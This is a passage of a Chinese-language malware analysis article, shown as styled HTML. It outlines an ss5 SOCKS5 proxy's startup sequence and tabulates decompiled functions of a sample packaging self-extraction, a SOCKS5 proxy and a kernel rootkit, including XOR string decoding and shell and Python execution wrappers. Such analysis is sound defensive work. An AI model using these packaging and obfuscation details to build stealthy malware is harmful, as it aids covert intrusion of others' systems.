229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">-</span></span></p></td><td data-colwidth="440" width="440" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">调试</span></font><span leaf="">/日志输出函数</span></span></p></td></tr></tbody></table><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="" style="font-style: normal;text-align: justify;font-size: 15px;letter-spacing: 1px;word-break: break-all;font-weight: bold;color: rgb(13, 74, 182);box-sizing: border-box;">启动流程</span><span leaf="">：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">1. 初始化默认配置: 监听地址 `0.0.0.0:1080`，运行用户 `nobody`</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2. 检查环境变量并覆盖配置（`SS5_SOCKS_USER`, `SS5_SOCKS_PORT`, `SS5_SOCKS_ADDR` 等）</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">3. 解析命令行参数</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">4. 加载 `.so` 模块（`S5LoadModules`）</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">5. 加载配置文件（`S5LoadConfig`）</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">6. 守护进程化（`S5MakeDaemon`）</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">7. 降权运行（`S5UIDSet`）</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">8. 进入主循环（`S5Core` / `S5MainThread`）</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="font-size: 17px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-size: 18px;">2.59a515e28d1515ae</span></span></span></strong></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">该文件是一个从bash脚本打包的ELF文件，包含了自解压、socks5、内核级Rookit三个组件协同工作。核心函数如下:</span></p><table style="border-collapse:collapse;width:426.1000pt;border:none;mso-border-left-alt:0.5000pt solid rgb(223,226,229);mso-border-top-alt:0.5000pt solid rgb(223,226,229);mso-border-right-alt:0.5000pt solid rgb(223,226,229);mso-border-bottom-alt:0.5000pt solid rgb(223,226,229);mso-padding-alt:0.0000pt 0.0000pt 0.0000pt 0.0000pt;"><tbody><tr><td data-colwidth="150" width="150" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt medium;border-style: solid solid none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><b><span style="font-family:宋体;font-weight:bold;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">函数</span></font></span></b></p></td><td data-colwidth="138" width="138" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt medium medium;border-style: solid solid none none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) currentcolor currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><b><span style="font-family:宋体;font-weight:bold;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">地址</span></font></span></b></p></td><td data-colwidth="563" width="563" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt medium medium;border-style: solid solid none none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) currentcolor currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><b><span style="font-family:宋体;font-weight:bold;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">功能</span></font></span></b></p></td></tr><tr><td data-colwidth="150" width="150" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt;border-style: solid;border-color: rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">sub_402354</span></span></p></td><td data-colwidth="138" width="138" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt 1pt medium;border-style: solid solid solid none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">0x4203348</span></span></p></td><td data-colwidth="563" width="563" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt 1pt medium;border-style: solid solid solid none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">初始化对象</span></font><span leaf=""> (XOR 解码 </span></span><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">/proc/self/exe</span></span><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">路径</span></font><span leaf="">)</span></span></p></td></tr><tr><td data-colwidth="150" width="150" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">sub_4046E0</span></span></p></td><td data-colwidth="138" width="138" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">0x4212448</span></span></p></td><td data-colwidth="563" width="563" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">初始化参数解析对象</span></font></span></p></td></tr><tr><td data-colwidth="150" width="150" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">sub_404A3A</span></span></p></td><td data-colwidth="138" width="138" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">0x4213306</span></span></p></td><td data-colwidth="563" width="563" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">XOR 解码包装 (调用 </span></span><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">sub_4059E4</span></span><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">, key=0x2E)</span></span></p></td></tr><tr><td data-colwidth="150" width="150" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">sub_474AD0</span></span></p></td><td data-colwidth="138" width="138" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">0x4672208</span></span></p></td><td data-colwidth="563" width="563" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">readlink()</span></span><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">系统调用包装</span></font><font face="宋体"><span leaf="">— 读取 </span></font></span><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">/proc/self/exe</span></span><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">获取自身路径</span></font></span></p></td></tr><tr><td data-colwidth="150" width="150" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">sub_4743B0</span></span></p></td><td data-colwidth="138" width="138" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">0x4670384</span></span></p></td><td data-colwidth="563" width="563" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">自定义</span></font></span><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">realpath()</span></span><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">— 通过 inode 向上爬升目录树解析绝对路径</span></font></span></p></td></tr><tr><td data-colwidth="150" width="150" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">sub_40E1F0</span></span></p></td><td data-colwidth="138" width="138" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">0x4248016</span></span></p></td><td data-colwidth="563" width="563" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">std::string 子串赋值</span></span></p></td></tr><tr><td data-colwidth="150" width="150" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">sub_404BB2</span></span></p></td><td data-colwidth="138" width="138" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">0x4213682</span></span></p></td><td data-colwidth="563" width="563" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">字符串后缀匹配</span></font><span leaf=""> (检查文件扩展名)</span></span></p></td></tr><tr><td data-colwidth="150" width="150" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">sub_40D3E0</span></span></p></td><td data-colwidth="138" width="138" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">0x4249568</span></span></p></td><td data-colwidth="563" width="563" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">字符串搜索</span></font><span leaf=""> (在 shebang 中查找解释器名)</span></span></p></td></tr><tr><td data-colwidth="150" width="150" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">sub_42D0A0</span></span></p></td><td data-colwidth="138" width="138" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">0x4366496</span></span></p></td><td data-colwidth="563" width="563" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">setenv()</span></span><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">— 设置环境变量</span></font></span></p></td></tr><tr><td data-colwidth="150" width="150" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">sub_404EAA</span></span></p></td><td data-colwidth="138" width="138" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">0x4214442</span></span></p></td><td data-colwidth="563" width="563" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">Shell 执行包装 (v63=0)</span></span></p></td></tr><tr><td data-colwidth="150" width="150" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">sub_404F48</span></span></p></td><td data-colwidth="138" width="138" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">0x4214600</span></span></p></td><td data-colwidth="563" width="563" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">Python 执行包装 (v63=1)</span></span></p></td></tr><tr><td data-colwidth="150" width="150" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">sub_404FE6</span></span></p></td><td data-colwidth="138" width="138" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">0x4214758</span></span></p></td><td data-colwidth="563" width="563" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) 